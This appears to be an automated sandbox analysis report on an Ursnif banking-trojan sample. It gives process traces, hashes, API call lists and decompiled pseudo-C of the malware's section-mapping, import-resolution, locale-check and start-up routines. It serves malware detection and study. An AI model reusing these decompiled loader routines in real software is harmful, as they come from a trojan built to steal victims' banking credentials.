                                                                                                                                                                            • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000001.00000003.714853915.00000000041D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.838266816.0000000005098000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                            Reputation:high

                                                                                                                                                                            General

                                                                                                                                                                            Start time:19:49:23
                                                                                                                                                                            Start date:03/05/2021
                                                                                                                                                                            Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                                                                                                                                                                            Imagebase:0x7ff7cee40000
                                                                                                                                                                            File size:823560 bytes
                                                                                                                                                                            MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high

                                                                                                                                                                            General

                                                                                                                                                                            Start time:19:49:24
                                                                                                                                                                            Start date:03/05/2021
                                                                                                                                                                            Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1260 CREDAT:17410 /prefetch:2
                                                                                                                                                                            Imagebase:0xce0000
                                                                                                                                                                            File size:822536 bytes
                                                                                                                                                                            MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high

                                                                                                                                                                            General

                                                                                                                                                                            Start time:19:50:07
                                                                                                                                                                            Start date:03/05/2021
                                                                                                                                                                            Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                                                                                                                                                                            Imagebase:0x7ff7cee40000
                                                                                                                                                                            File size:823560 bytes
                                                                                                                                                                            MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high

                                                                                                                                                                            General

                                                                                                                                                                            Start time:19:50:08
                                                                                                                                                                            Start date:03/05/2021
                                                                                                                                                                            Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5828 CREDAT:17410 /prefetch:2
                                                                                                                                                                            Imagebase:0xce0000
                                                                                                                                                                            File size:822536 bytes
                                                                                                                                                                            MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high

                                                                                                                                                                            General

                                                                                                                                                                            Start time:19:50:31
                                                                                                                                                                            Start date:03/05/2021
                                                                                                                                                                            Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                                                                                                                                                                            Imagebase:0x7ff7cee40000
                                                                                                                                                                            File size:823560 bytes
                                                                                                                                                                            MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high

                                                                                                                                                                            General

                                                                                                                                                                            Start time:19:50:32
                                                                                                                                                                            Start date:03/05/2021
                                                                                                                                                                            Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4996 CREDAT:17410 /prefetch:2
                                                                                                                                                                            Imagebase:0xce0000
                                                                                                                                                                            File size:822536 bytes
                                                                                                                                                                            MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high

                                                                                                                                                                            Disassembly

                                                                                                                                                                            Code Analysis

                                                                                                                                                                              Executed Functions

                                                                                                                                                                              APIs
                                                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,000007A6,00003000,00000040,000007A6,66DFBA10), ref: 66DFC072
                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,0000002B,00003000,00000040,66DFBA6E), ref: 66DFC0A9
                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,0000F0DD,00003000,00000040), ref: 66DFC109
                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 66DFC13F
                                                                                                                                                                              • VirtualProtect.KERNEL32(66DB0000,00000000,00000004,66DFBF94), ref: 66DFC244
                                                                                                                                                                              • VirtualProtect.KERNEL32(66DB0000,00001000,00000004,66DFBF94), ref: 66DFC26B
                                                                                                                                                                              • VirtualProtect.KERNEL32(00000000,?,00000002,66DFBF94), ref: 66DFC338
                                                                                                                                                                              • VirtualProtect.KERNEL32(00000000,?,00000002,66DFBF94,?), ref: 66DFC38E
                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 66DFC3AA
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000001.00000002.1014767810.0000000066DFB000.00000040.00020000.sdmp, Offset: 66DFB000, based on PE: false
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Virtual$Protect$Alloc$Free
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2574235972-0
                                                                                                                                                                              • Opcode ID: 1152dc6f38a6bf9fe1bda6254ba7163402deb398324214f3b73d2ee5c3fae3d3
                                                                                                                                                                              • Instruction ID: 8080aa7fbe1b0c295166a8057a59423acb11cd2f1cb21abe4f68a8f64ce752ff
                                                                                                                                                                              • Opcode Fuzzy Hash: 1152dc6f38a6bf9fe1bda6254ba7163402deb398324214f3b73d2ee5c3fae3d3
                                                                                                                                                                              • Instruction Fuzzy Hash: 92D14672600209AFDB11CF5CC880A5237BAFF48310B1F4A94ED4D9F69AE671ED219B74
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 69%
                                                                                                                                                                              			E66DB1979(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                                              				struct _FILETIME* _v16;
                                                                                                                                                                              				short _v60;
                                                                                                                                                                              				struct _FILETIME* _t14;
                                                                                                                                                                              				intOrPtr _t15;
                                                                                                                                                                              				long _t18;
                                                                                                                                                                              				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14); // current time as a 64-bit FILETIME (100-ns units) in _v16/_v12
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L66DB2210(); // _aulldiv (see APIs): FILETIME / 0x19254D38000 = 48 hours in 100-ns units, so the value below changes every two days
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x66db41d0;
				_push(_t15 + 0x66db505e);
				_push(_t15 + 0x66db5054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L66DB220A(); // _snwprintf (see APIs): formats the time-derived value into a 22-wchar object name in _v60
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000; // no size given: use one page so CreateFileMappingW can still open an existing mapping by name
				}
				// INVALID_HANDLE_VALUE (0xffffffff) = pagefile-backed mapping; 4 = PAGE_READWRITE; name from _v60
				_t19 = CreateFileMappingW(0xffffffff, 0x66db41c0, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					// with a size the mapping may be new; without one it must already exist (0xb7 = ERROR_ALREADY_EXISTS)
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed; 6 = FILE_MAP_READ | FILE_MAP_WRITE, whole mapping
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34; // out: mapping handle
							 *_a12 = _t22; // out: view base address
							_t32 = 0;
						}
					} else {
						_t32 = 2; // ERROR_FILE_NOT_FOUND: caller asked for an existing mapping and none was found
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32; // Win32 error code, 0 on success
			}

0x66db1979
0x66db1982
0x66db1986
0x66db198c
0x66db1991
0x66db1996
0x66db1999
0x66db199c
0x66db19a1
0x66db19a2
0x66db19a5
0x66db19b0
0x66db19b7
0x66db19bb
0x66db19bd
0x66db19be
0x66db19c1
0x66db19c6
0x66db19d0
0x66db19d2
0x66db19d2
0x66db19e6
0x66db19ec
0x66db19f0
0x66db1a40
0x66db19f2
0x66db19fb
0x66db1a11
0x66db1a19
0x66db1a2b
0x66db1a2f
0x00000000
0x00000000
0x66db1a1b
0x66db1a1e
0x66db1a23
0x66db1a25
0x66db1a25
0x66db1a06
0x66db1a08
0x66db1a31
0x66db1a32
0x66db1a32
0x66db19fb
0x66db1a48

APIs
• GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,66DB176E,0000000A,?,?), ref: 66DB1986
• _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 66DB199C
• _snwprintf.NTDLL ref: 66DB19C1
• CreateFileMappingW.KERNELBASE(000000FF,66DB41C0,00000004,00000000,?,?), ref: 66DB19E6
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,66DB176E,0000000A,?), ref: 66DB19FD
• MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 66DB1A11
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,66DB176E,0000000A,?), ref: 66DB1A29
• CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,66DB176E,0000000A), ref: 66DB1A32
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,66DB176E,0000000A,?), ref: 66DB1A3A
Memory Dump Source
• Source File: 00000001.00000002.1014684015.0000000066DB1000.00000020.00020000.sdmp, Offset: 66DB0000, based on PE: true
• Associated: 00000001.00000002.1014676007.0000000066DB0000.00000002.00020000.sdmp
• Associated: 00000001.00000002.1014691870.0000000066DB3000.00000002.00020000.sdmp
• Associated: 00000001.00000002.1014699312.0000000066DB5000.00000004.00020000.sdmp
• Associated: 00000001.00000002.1014708057.0000000066DB6000.00000002.00020000.sdmp
Similarity
• API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
• String ID:
• API String ID: 1724014008-0
• Opcode ID: 2187b91e7d353c5f6c43077769b49785a11c9470a7b5ba9a1e4bdbdcdb4be460
• Instruction ID: 80d25d5f9bc57f51f48f707be9af4ac9c35cdf68f1714765268204654da0a468
• Opcode Fuzzy Hash: 2187b91e7d353c5f6c43077769b49785a11c9470a7b5ba9a1e4bdbdcdb4be460
• Instruction Fuzzy Hash: 9B21C5F2900118FFEB10AF99DC85E9E7BBDEB89354F114025F612D7188D630AD45CBA0
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 72%
			E66DB18D1(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax; // context struct: [0] = section handle, [4] = size, [8] = page protection, [0x18]/[0x1c] = function pointers
				asm("stosd"); // six stosd: zero-fill the OBJECT_ATTRIBUTES block below before the fields are set
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4)); // MaximumSize (low part) taken from the context struct
				_v16 = 0; // section handle out-parameter
				_v12 = 0; // mapped view base, filled in by E66DB1B89
				// OBJECT_ATTRIBUTES: Length = 0x18, no RootDirectory, no ObjectName (anonymous section)
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40; // Attributes = OBJ_CASE_INSENSITIVE
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				// 0xf001f = SECTION_ALL_ACCESS; protection comes from the context struct; 0x8000000 = SEC_COMMIT; no backing file (pagefile-backed)
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34); // NTSTATUS failure: hand the status to the callback at +0x18
				} else {
					 *_t48 = _v16; // store the section handle in the context struct
					_t39 = E66DB1B89(_t48,  &_v12); // executed; maps a view of the section, address returned in _v12
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16); // mapping failed: pass the section handle to the callback at +0x1c
					} else {
						memset(_v12, 0, _v24); // clear the whole view
						 *_a4 = _v12; // out: view base address
					}
				}
				return _t47; // 0 on success
			}

                                                                                                                                                                              APIs
                                                                                                                                                                              • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,73B74EE0,00000000,00000000), ref: 66DB192E
                                                                                                                                                                                • Part of subcall function 66DB1B89: NtMapViewOfSection.NTDLL(00000000,000000FF,66DB1943,00000000,00000000,?,?,00000002,00000000,?,?,00000000,?,66DB1943,?), ref: 66DB1BB6
                                                                                                                                                                              • memset.NTDLL ref: 66DB1950
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000001.00000002.1014684015.0000000066DB1000.00000020.00020000.sdmp, Offset: 66DB0000, based on PE: true
• Associated: 00000001.00000002.1014676007.0000000066DB0000.00000002.00020000.sdmp
• Associated: 00000001.00000002.1014691870.0000000066DB3000.00000002.00020000.sdmp
• Associated: 00000001.00000002.1014699312.0000000066DB5000.00000004.00020000.sdmp
• Associated: 00000001.00000002.1014708057.0000000066DB6000.00000002.00020000.sdmp
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Section$CreateViewmemset
                                                                                                                                                                              • String ID: @
                                                                                                                                                                              • API String ID: 2533685722-2766056989
                                                                                                                                                                              • Opcode ID: 00af36b428359ca772932176b9c6d2f97bd417452e06b8a4b42cf2ee787d1e4b
                                                                                                                                                                              • Instruction ID: b84a3484c6147c0ab3ee0ddd7363a3ba624f630d50b7d2ce68a68a48aae07eb9
                                                                                                                                                                              • Opcode Fuzzy Hash: 00af36b428359ca772932176b9c6d2f97bd417452e06b8a4b42cf2ee787d1e4b
                                                                                                                                                                              • Instruction Fuzzy Hash: 1A211DB1D00209AFDB01CFA9CC849DEFBF9EF48354F108529E556F3210D730AA448BA4
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 58%
                                                                                                                                                                              			E66DB1566(void* __ecx) {
                                                                                                                                                                              				char _v8;
                                                                                                                                                                              				signed short _t7;
                                                                                                                                                                              
                                                                                                                                                                              				_v8 = _v8 & 0x00000000;
                                                                                                                                                                              				_t7 = GetLocaleInfoA(0x400, 0x5a,  &_v8, 4); // executed
                                                                                                                                                                              				if(_t7 == 0) {
                                                                                                                                                                              					__imp__GetSystemDefaultUILanguage();
                                                                                                                                                                              					VerLanguageNameA(_t7 & 0xffff,  &_v8, 4);
                                                                                                                                                                              				}
                                                                                                                                                                              				return _v8;
                                                                                                                                                                              			}

                                                                                                                                                                              APIs
                                                                                                                                                                              • GetLocaleInfoA.KERNELBASE(00000400,0000005A,00000000,00000004,?,?,66DB1C5E,?,66DB1810,?,00000000,00000000,?,?,?,66DB1810), ref: 66DB157B
                                                                                                                                                                              • GetSystemDefaultUILanguage.KERNEL32(?,?,66DB1C5E,?,66DB1810,?,00000000,00000000,?,?,?,66DB1810), ref: 66DB1585
                                                                                                                                                                              • VerLanguageNameA.KERNEL32(?,00000000,00000004,?,?,66DB1C5E,?,66DB1810,?,00000000,00000000,?,?,?,66DB1810), ref: 66DB1598
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000001.00000002.1014684015.0000000066DB1000.00000020.00020000.sdmp, Offset: 66DB0000, based on PE: true
• Associated: 00000001.00000002.1014676007.0000000066DB0000.00000002.00020000.sdmp
• Associated: 00000001.00000002.1014691870.0000000066DB3000.00000002.00020000.sdmp
• Associated: 00000001.00000002.1014699312.0000000066DB5000.00000004.00020000.sdmp
• Associated: 00000001.00000002.1014708057.0000000066DB6000.00000002.00020000.sdmp
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Language$DefaultInfoLocaleNameSystem
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3724080410-0
                                                                                                                                                                              • Opcode ID: 6a6957d46f8ce653dd9238f566f16b2a82db7e634105b97ccbecba025e03e30a
                                                                                                                                                                              • Instruction ID: fef903b80051fdb0851fdbe253e54554ab1ccbb54d58fa7b52b24f9c3315c204
                                                                                                                                                                              • Opcode Fuzzy Hash: 6a6957d46f8ce653dd9238f566f16b2a82db7e634105b97ccbecba025e03e30a
                                                                                                                                                                              • Instruction Fuzzy Hash: 13E048E4640204F7E710DB919C06F7D72B89B4074AF500054F701D60C4D6749E04A775
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E66DB1F31(void* __edi, intOrPtr _a4) {
                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                              				intOrPtr* _v12;
                                                                                                                                                                              				_Unknown_base(*)()** _v16;
                                                                                                                                                                              				signed int _v20;
                                                                                                                                                                              				signed short _v24;
                                                                                                                                                                              				struct HINSTANCE__* _v28;
                                                                                                                                                                              				intOrPtr _t43;
                                                                                                                                                                              				intOrPtr* _t45;
                                                                                                                                                                              				intOrPtr _t46;
                                                                                                                                                                              				struct HINSTANCE__* _t47;
                                                                                                                                                                              				intOrPtr* _t49;
                                                                                                                                                                              				intOrPtr _t50;
                                                                                                                                                                              				signed short _t51;
                                                                                                                                                                              				_Unknown_base(*)()* _t53;
                                                                                                                                                                              				CHAR* _t54;
                                                                                                                                                                              				_Unknown_base(*)()* _t55;
                                                                                                                                                                              				void* _t58;
                                                                                                                                                                              				signed int _t59;
                                                                                                                                                                              				_Unknown_base(*)()* _t60;
                                                                                                                                                                              				intOrPtr _t61;
                                                                                                                                                                              				intOrPtr _t65;
                                                                                                                                                                              				signed int _t68;
                                                                                                                                                                              				void* _t69;
                                                                                                                                                                              				CHAR* _t71;
                                                                                                                                                                              				signed short* _t73;
                                                                                                                                                                              
                                                                                                                                                                              				_t69 = __edi;
                                                                                                                                                                              				_v20 = _v20 & 0x00000000;
                                                                                                                                                                              				_t59 =  *0x66db41cc;
                                                                                                                                                                              				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
                                                                                                                                                                              				if(_t43 != 0) {
                                                                                                                                                                              					_t45 = _t43 + __edi;
                                                                                                                                                                              					_v12 = _t45;
                                                                                                                                                                              					_t46 =  *((intOrPtr*)(_t45 + 0xc));
                                                                                                                                                                              					if(_t46 != 0) {
                                                                                                                                                                              						while(1) {
                                                                                                                                                                              							_t71 = _t46 + _t69;
                                                                                                                                                                              							_t47 = LoadLibraryA(_t71); // executed
                                                                                                                                                                              							_v28 = _t47;
                                                                                                                                                                              							if(_t47 == 0) {
                                                                                                                                                                              								break;
                                                                                                                                                                              							}
                                                                                                                                                                              							_v24 = _v24 & 0x00000000;
                                                                                                                                                                              							 *_t71 = _t59 - 0x63699bc3;
                                                                                                                                                                              							_t49 = _v12;
                                                                                                                                                                              							_t61 =  *((intOrPtr*)(_t49 + 0x10));
                                                                                                                                                                              							_t50 =  *_t49;
                                                                                                                                                                              							if(_t50 != 0) {
                                                                                                                                                                              								L6:
                                                                                                                                                                              								_t73 = _t50 + _t69;
                                                                                                                                                                              								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x63699b44;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x63699bc3;
										}
										 *_v16 = _t55;
										_t58 = 0x725990f8 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x9c9664bb;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}

APIs
• LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 66DB1F69
• GetProcAddress.KERNEL32(?,00000000), ref: 66DB1FDB
Memory Dump Source
• Source File: 00000001.00000002.1014684015.0000000066DB1000.00000020.00020000.sdmp, Offset: 66DB0000, based on PE: true
• Associated: 00000001.00000002.1014676007.0000000066DB0000.00000002.00020000.sdmp
• Associated: 00000001.00000002.1014691870.0000000066DB3000.00000002.00020000.sdmp
• Associated: 00000001.00000002.1014699312.0000000066DB5000.00000004.00020000.sdmp
• Associated: 00000001.00000002.1014708057.0000000066DB6000.00000002.00020000.sdmp
Similarity
• API ID: AddressLibraryLoadProc
• String ID:
• API String ID: 2574300362-0
• Opcode ID: 1b32ab2c4c8680839e4e582ddbdfd8c3eecae11c8f775f3576a4e1d66e67b82e
• Instruction ID: 4d6a5412be8b7c7022c8a52b0b1b497b5b559fe803879d343d6632ef1d3b025c
• Opcode Fuzzy Hash: 1b32ab2c4c8680839e4e582ddbdfd8c3eecae11c8f775f3576a4e1d66e67b82e
• Instruction Fuzzy Hash: E8313BB2E0020ADFEB14CF5ACC80AAEB7F5BF59349F104169D952E7248E774DA40CB91
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 68%
E66DB1B89(void** __esi, PVOID* _a4) {
	long _v8;
	void* _v12;
	void* _v16;
	long _t13;

	_v16 = 0;
	asm("stosd");
	_v8 = 0;
	_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
	if(_t13 < 0) {
		_push(_t13);
		return __esi[6]();
	}
	return 0;
}

0x66db1b9b
0x66db1ba1
0x66db1baf
0x66db1bb6
0x66db1bbb
0x66db1bc1
0x00000000
0x66db1bc2
0x00000000

APIs
• NtMapViewOfSection.NTDLL(00000000,000000FF,66DB1943,00000000,00000000,?,?,00000002,00000000,?,?,00000000,?,66DB1943,?), ref: 66DB1BB6
Memory Dump Source
• Source File: 00000001.00000002.1014684015.0000000066DB1000.00000020.00020000.sdmp, Offset: 66DB0000, based on PE: true
• Associated: 00000001.00000002.1014676007.0000000066DB0000.00000002.00020000.sdmp
• Associated: 00000001.00000002.1014691870.0000000066DB3000.00000002.00020000.sdmp
• Associated: 00000001.00000002.1014699312.0000000066DB5000.00000004.00020000.sdmp
• Associated: 00000001.00000002.1014708057.0000000066DB6000.00000002.00020000.sdmp
Similarity
• API ID: SectionView
• String ID:
• API String ID: 1323581903-0
• Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
• Instruction ID: 6bf0f2845e84d0463048e27ef8be8eb30716991a4f1598927dd82ac4bf3a7aed
• Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
• Instruction Fuzzy Hash: 46F01CB690020CFFEB119FA5CC89C9FBBFDEB45394B104939B552E1194E6309E089B60
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 80%
E66DB17A7(intOrPtr _a4) {
	char _v28;
	struct _SYSTEMTIME _v44;
	char _v48;
	long _v52;
	long _v56;
	void* __edi;
	long _t21;
	int _t23;
	long _t26;
	long _t27;
	long _t31;
	void* _t37;
	intOrPtr _t39;
	intOrPtr _t44;
	signed int _t45;
	void* _t50;
	signed int _t54;
	void* _t56;
	intOrPtr* _t57;

	_t21 = E66DB146C();
	_v52 = _t21;
	if(_t21 != 0) {
		L18:
		return _t21;
	} else {
		goto L1;
	}
	do {
		L1:
		GetSystemTime( &_v44);
		_t23 = SwitchToThread();
		asm("cdq");
		_t45 = 9;
		_t54 = _t23 + (_v44.wMilliseconds & 0x0000ffff) % _t45;
		_t26 = E66DB15A3(0, _t54); // executed
		_v56 = _t26;
		Sleep(_t54 << 5); // executed
		_t21 = _v56;
	} while (_t21 == 0xc);
	if(_t21 != 0) {
		goto L18;
	}
	_t27 = E66DB1C12(_t45); // executed
	_v52 = _t27;
	if(_t27 != 0) {
		L16:
		_t21 = _v52;
		if(_t21 == 0xffffffff) {
			_t21 = GetLastError();
		}
		goto L18;
	}
	if(_a4 != 0) {
		L11:
		_push(0);
		_t56 = E66DB1CA4(E66DB16EC,  &_v28);
		if(_t56 == 0) {
			_v56 = GetLastError();
		} else {
			_t31 = WaitForSingleObject(_t56, 0xffffffff);
			_v56 = _t31;
			if(_t31 == 0) {
				GetExitCodeThread(_t56,  &_v56);
			}
			CloseHandle(_t56);
		}
		goto L16;
	}
	if(E66DB1D7C(_t45,  &_v48) != 0) {
		 *0x66db41b8 = 0;
		goto L11;
	}
	_t44 = _v48;
	_t57 = __imp__GetLongPathNameW;
	_t37 =  *_t57(_t44, 0, 0); // executed
	_t50 = _t37;
	if(_t50 == 0) {
		L9:
		 *0x66db41b8 = _t44;
		goto L11;
	}
	_t15 = _t50 + 2; // 0x2
	_t39 = E66DB1C8F(_t50 + _t15);
	 *0x66db41b8 = _t39;
	if(_t39 == 0) {
		goto L9;
	} else {
		 *_t57(_t44, _t39, _t50); // executed
		E66DB136A(_t44);
		goto L11;
	}
}

                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 66DB146C: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,66DB17B8,73B763F0,00000000), ref: 66DB147B
                                                                                                                                                                                • Part of subcall function 66DB146C: GetVersion.KERNEL32 ref: 66DB148A
                                                                                                                                                                                • Part of subcall function 66DB146C: GetCurrentProcessId.KERNEL32 ref: 66DB1499
                                                                                                                                                                                • Part of subcall function 66DB146C: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 66DB14B2
                                                                                                                                                                              • GetSystemTime.KERNEL32(?,73B763F0,00000000), ref: 66DB17CB
                                                                                                                                                                              • SwitchToThread.KERNEL32 ref: 66DB17D1
                                                                                                                                                                                • Part of subcall function 66DB15A3: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,00000000,00000000), ref: 66DB15F9
                                                                                                                                                                                • Part of subcall function 66DB15A3: memcpy.NTDLL(?,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,66DB17EC), ref: 66DB168B
                                                                                                                                                                                • Part of subcall function 66DB15A3: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00000000,00000000), ref: 66DB16A6
                                                                                                                                                                              • Sleep.KERNELBASE(00000000,00000000), ref: 66DB17F4
                                                                                                                                                                              • GetLongPathNameW.KERNELBASE ref: 66DB183C
                                                                                                                                                                              • GetLongPathNameW.KERNELBASE ref: 66DB185A
                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,66DB16EC,?,00000000), ref: 66DB188C
                                                                                                                                                                              • GetExitCodeThread.KERNEL32(00000000,?), ref: 66DB18A0
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 66DB18A7
                                                                                                                                                                              • GetLastError.KERNEL32(66DB16EC,?,00000000), ref: 66DB18AF
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 66DB18C2
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000001.00000002.1014684015.0000000066DB1000.00000020.00020000.sdmp, Offset: 66DB0000, based on PE: true
• Associated: 00000001.00000002.1014676007.0000000066DB0000.00000002.00020000.sdmp
